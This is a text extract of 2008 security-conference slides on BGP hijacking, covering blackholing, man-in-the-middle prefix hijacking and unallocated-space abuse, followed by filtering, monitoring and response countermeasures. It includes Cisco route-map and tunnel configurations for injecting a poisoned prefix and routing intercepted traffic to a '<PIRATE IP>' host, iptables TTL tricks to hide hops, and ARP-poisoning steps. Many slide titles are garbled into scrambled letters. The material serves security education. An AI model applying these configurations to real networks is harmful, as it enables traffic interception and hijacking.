Internet Pirates: blackholing, hijacking and other dirty tricks

Wo|man in‐the Middle

Ngp_rcq md rfc Glrcplcr Blackholing, hijacking and other dirty tricks

Carlos Fragoso Mariscal

London 2008

Ufm _k G = • Informa(on Security Professional • Opera(ons and Security Manager for Supercompu(ng Center of Catalonia – Anella Cien(fica RREN, CATNIX IXP …

• Technical Director of one eSecurity • Involved in several IR communi(es – ABUSES, TF‐CSIRT, NSP‐SEC …

• SANS Volunteer since 2002 • Cisco Systems and GIAC Cer(fied – CCNA, CCNP*, GSEC, GCFW, GCIH

Ngp_rcq md rfc Glrcplcr

Internet 101 A5acks Countermeasures


Internet 101 How it works

Threats

ASacks Countermeasures

How

work?

does the Internet

Unallocated

Autonomous System

AS Number (ASN)

Network allocaDons

Carrier

ISP Telco

Enterprise Cable/DSL Provider

Service Provider

IXP’s

BGPv4 RFC1771

Enterprise Cable/DSL Provider

Service Provider

ISP Telco

Carrier

BGP OSPF

Fmu pmsrgle r_`jcq umpi =

Global

ISIS RIP StaDc Connected

Each rou(ng protocol builds its own table based on its metrics

1

Prefixes are elected based on prefix mask and administraDve distance

2

Prefixes are installed 3

More specific prefixes take precedence

@EN Qcjcargml ?jempgrfk 1. Highest Local Preference 2. Locally originated, aggregated, redistribu(on… 3. Shortest AS‐PATH 4. Lowest origin type 5. Lowest Mul( Exit Discriminator (MED) 6. eBGP over iBGP paths 7. Lowest IGP metric to next‐hop 8. Received first …etc…

Any prefix received with the local AS in its AS‐Path a5ribute is dropped

BGP table version is NNNNNNNN, local router ID is A.B.C.D Status codes: s suppressed, d damped, h history, * valid, > best, i – internal, r RIB‐failure, S Stale Origin codes: i ‐ IGP, e ‐ EGP, ? ‐ incomplete

Network Next Hop Metric Path * A.B.0.0 10.10.10.1 0 300 200 100 10 i * 10.10.20.1 0 300 100 80 i

Routing entry for A.B.0.0/16 Known via "bgp 1", distance 20, metric 0 Tag 7018, type external Last update from 10.10.20.1 1d00h ago Routing Descriptor Blocks: * 10.10.20.1, from 10.10.20.1, 1d00h ago Route metric is 0, traffic share count is 1 AS Hops 3 Route tag 7018

BGP table

Global table

Internet Rou(ng Registry (IRR)

• Route registra(on database • Rou(ng Policy descrip(on language (RFC 2622) • Common objects – route / route‐set – aut‐num / AS‐Set – Peering‐set

• Most well‐known – RADB – RIPE

route: A.B.0.0/19 descr: Monkey Business origin: AS100 mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered

as‐set: AS‐MONKEY‐CUSTOMERS descr: MONKEY CUSTOMERS members: AS100 members: AS200 members: AS300 tech‐c: MONK1‐RIPE admin‐c: MONK2‐RIPE mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered

Source: RIPE Whois Database – h6p://www.ripe.net/db/whois.html

route: C.D.0.0/24 descr: Monkey Shop origin: AS200 mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered

Source: “Stealing the Internet” Defcon Talk – h6p://www.defcon.org

So it is ...

BGP …vulnerable?

Rfpc_rq • Internet is a chain of trust – “A chain is only as strong as its weakest link”

• Weak peer filtering policies

• Unauthorized route IRR registra(on • Rou(ng infrastructure compromise

• Future BGP peering vulnerabili(es


Internet 101 A5acks Blackholing

MitM Hijacking

Ghost Hijacking

Countermeasures

@j_aifmjgle • Poisoning a more specific route – Ex: /24 overlapping main /19

• Traffic is dropped at des(na(on – Route to Null0

• Not very effec(ve for small prefixes (</24) – Depends on transit providers policies

WmsRs`c `cdmpc @F glagbclr

Source: RIPE‐NCC – h6p://www.ripe.net/news/study‐youtube‐hijacking.html

WmsRs`c bspgle @F glagbclr

Source: RIPE‐NCC – h6p://www.ripe.net/news/study‐youtube‐hijacking.html

A.Pilosov

T.Kapela

July 31st – August 2nd 2008 in Las Vegas

KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise

• Prefix poisoning • Traffic intercep(on and abuse

• Traffic forwarding

• Obfusca(on (op(onal)

Scream? Don’t you …

AS 10

AS 40

AS 20

AS 30

AS 100

AS 60

AS 50 AS 200

Based on “Stealing the Internet” Defcon Talk – h6p://www.defcon.org

KgrK Fgh_aigle • Vic(m reconaissance

– RR Database objects – Internet topology around it – NOC social engineering

• ASack Engineering – Plan reply path (take note of ASN’s) – Possible points of injec(on

• Rou(ng Infrastructure compromise • Prefix poisoning • Traffic intercep(on and abuse • Traffic forwarding • Obfusca(on (op(onal)

AS 100 AS 100 AS 10

AS 40

AS 20

AS 30

AS 60

AS 50 AS 200


1.0.0.0/16

Pirate compromises rou(ng infrastructure on AS100

3

Pirate performs

reconaisance on AS200

1

KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise • Prefix poisoning – Specific BGP prefix injec(on – AS‐PATH prepend reply path ASN’s – Policy rou(ng to nail next‐hop on

• Traffic intercep(on and abuse • Traffic forwarding • Obfusca(on (op(onal)

Nmgqml Pmsrc Glhcargml ip prefix‐list NET A.B.C.0/24 route‐map hijacked permit 10

match ip address prefix‐list NET set as‐path prepend 10 20 200

route‐map hijacked permit 20

router bgp 100 neighbor <AS10_PEER> route‐map hijack out

AS 10

AS 40

AS 20

AS 30

AS 100

AS 60

AS 50 AS 200

Traffic is received by vic(m without no(cing abusive ac(vity.

6


Traffic is abused (i.e.sniff) and sent back using AS10 (policy rou(ng)

5

Nmjgaw pmsrgle interface Tunnel10 description MONKEY‐PIRATE ip address 10.10.10.1 255.255.255.252 ip policy route‐map BACK tunnel source interface Loopback0 tunnel destination <PIRATE IP> ! interface FastEthernet0 description Link to AS10 PROVIDER ip address 172.16.1.1 255.255.255.252 ! ip route A.B.C.0 0.0.0.255 10.10.10.2 ip access‐list standard NET A.B.C.0 0.0.0.255 route‐map BACK permit 10

match ip address NET set ip next‐hop 172.16.1.2

route‐map BACK permit 20

Déjà vu? Isn’t it a…

?PN nmgqmlgle _rr_ai

192.168.0.1 FEEA:FEEA:FEEA

192.168.0.200 0001:0236:8624

192.168.0.20 000E:3858:AEDE

1. IP forwarding and sniffing activation

2. Send spoofed ARP reply (poison)

0:1:2:36:86:24 0:e:38:58:ae:de

arp reply 192.168.0.1 is-at 0:1:2:36:86:24

4. Traffic sent to default gateway

00-01-02-36-86-24 5. Traffic capture and forwarding

3. ARP update (poisoned) 192.168.0.1

00-01-02-36-86-24

KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise

• Prefix poisoning • Traffic intercep(on and abuse

• Traffic forwarding

• Obfusca(on (op(onal)

Rp_acpmsrc `cdmpc Fgh_aigle


Rp_acpmsrc bspgle Fgh_aigle


+ 10

Rp_acpmsrc bspgle Fgh_aigle ugrf RRJ _bbgrgtc rcaflgosc


RRJ _bbgrgtc ml Jglsv

iptables ‐t mangle ‐I PREROUTING ‐i eth1 ‐j TTL ‐‐ttl‐inc N

iptables ‐t mangle ‐I POSTROUTING ‐o eth1 ‐j TTL ‐‐ttl‐inc N

sysctl ‐w net.ipv4.ip_forward=1

F_lbq-ml J_` • GNS3 graphical network simulator • Dynamips Cisco IOS emulator

• Dynagen network configura(on generator • VMWare Fusion VM’s for end nodes

a Ghost? Have you seen …

Efmqr Fgh_aigle

• Unallocated space hijacking • Used temporarily by aSackers to hide their ac(vity and avoid abuse no(fica(ons

• Nowadays mostly used for spam but could be used for other dirty issues (terrorism)

• Legal issues who is responsible for something that doesn’t belong to anyone?


Internet 101 ASacks Countermeasures Protec(on

Detec(on

Reac(on

ready? Got …

Npmrcargml • Review and harden your peerings • Register and protect your objects on IRR DB • Take Rou(ng Registry RIPE‐NCC training course – hSp://www.ripe.net/training/rr/index.html

• Hide your infrastructure: et up an(spoofing (ACL’s or RPF) and infrastructure (ACL’s) filtering

• Have beers with other NOC or SOC teams – Why not on a SANS conference? – Join mailing lists instead

Nccp pmsrc dgjrcpgle • Where ? – Customer side – Internet Exchange Points (IXP) / Private peerings – Transit providers

• What ? – Maximum number – AS‐Path – Prefixes (sta(c or dynamic)

o Tips’n’tricks – IRRToolset tool (RIPE‐NCC, ISC) – Bogon Route Servers (Cymru) – Secure BGP configura(on guides (Cymru, NIST, SANS RR papers)

vigilant? enough…

Bcrcargml • Aler(ng Systems – Prefix‐based NIDS

• Tools – RIPE Rou(ng Informa(on Service MyASN

• hSp://www.ris.ripe.net/myasn.html

– Prefix Hijack Alert System (PHAS) • hSp://phas.netsec.colostate.edu/

– BGPMon Project • hSp://bgpmon.net/

– University of Roma iBGPPlay • hSp://ibgplay.caspur.it

Source: RIPE RIS– hSp://www.ris.ripe.net

Source: Colorado State University – hSp://netsec.cs.colostate.edu/phas/

Source: BGPmon project – hSp://bgpmon.net/

@ENkml k_gj q_knjc Possible Prefix Hijack (Code: 11) 1 number of peer(s) detected this updates for your prefix A.B.C.0/19:

Update details: 2008‐11‐11 02:01 (UTC) A.B.C.0/24 Announced by: AS16735 (Companhia de Telecomunicacoes do Brasil Central)

Transit AS: 27664 (CTBC Multimedia) ASpath: 27664 16735

React!!! Then ...

Pc_argml • Crying and screaming is allowed • Contact upstreams providers and related mates – If you did, remember them you paid their beers – iNOC Dial‐By‐Asn (iNOC‐DBA) SIP phone

• Pray for a prompt response – From hours to days – Depends on how important you are

• No(fy Law Enforcement Organiza(ons (LEO’s) if necessary

Internet 101 A5acks Countermeasures

But what about… …tomorrow?

Qcaspc((mpgegl) @EN • Drao on IETF RPSEC Working Group • PKI authen(ca(on for IP address blocks mapping ASN assignments

• Digital signature carried over BGP transi(ve path aSribute

• Verifica(on on external device • “Chicken and Egg” problem … wai(ng for RFC and ISP deployment

Déjà vu? Isn’t it a…

References 1/2

• “Stealing the Internet” A.Pilisov, T.Kapela – Defcon 16 Conference hSp://www.defcon.org/html/links/defcon‐media‐archives.html#dc_16

• “BGP RouDng Security” D.Wendlandt – Carnegie Mellon University hSp://www.cs.cmu.edu/~dwendlan/rou(ng/

• “BGP Security resources” hSp://www.bgp4.as/security

References 2/2

• “BGP Vulnerability TesDng” S.Convery MaShew Franz hSp://www.blackhat.com/presenta(ons/bh‐usa‐03/bh‐us‐03‐convery‐franz‐v3.pdf

• “Hacking Cisco Networks Exposed” A.Vladimirov, A.Mikhailovsky – McGraw Hill ISBN: 0‐07‐225917‐5

THANKS!

[email protected] hSp://carlos.fragoso.eu

STAY TUNED!

Internet Pirates: blackholing, hijacking and other dirty tricks

Technology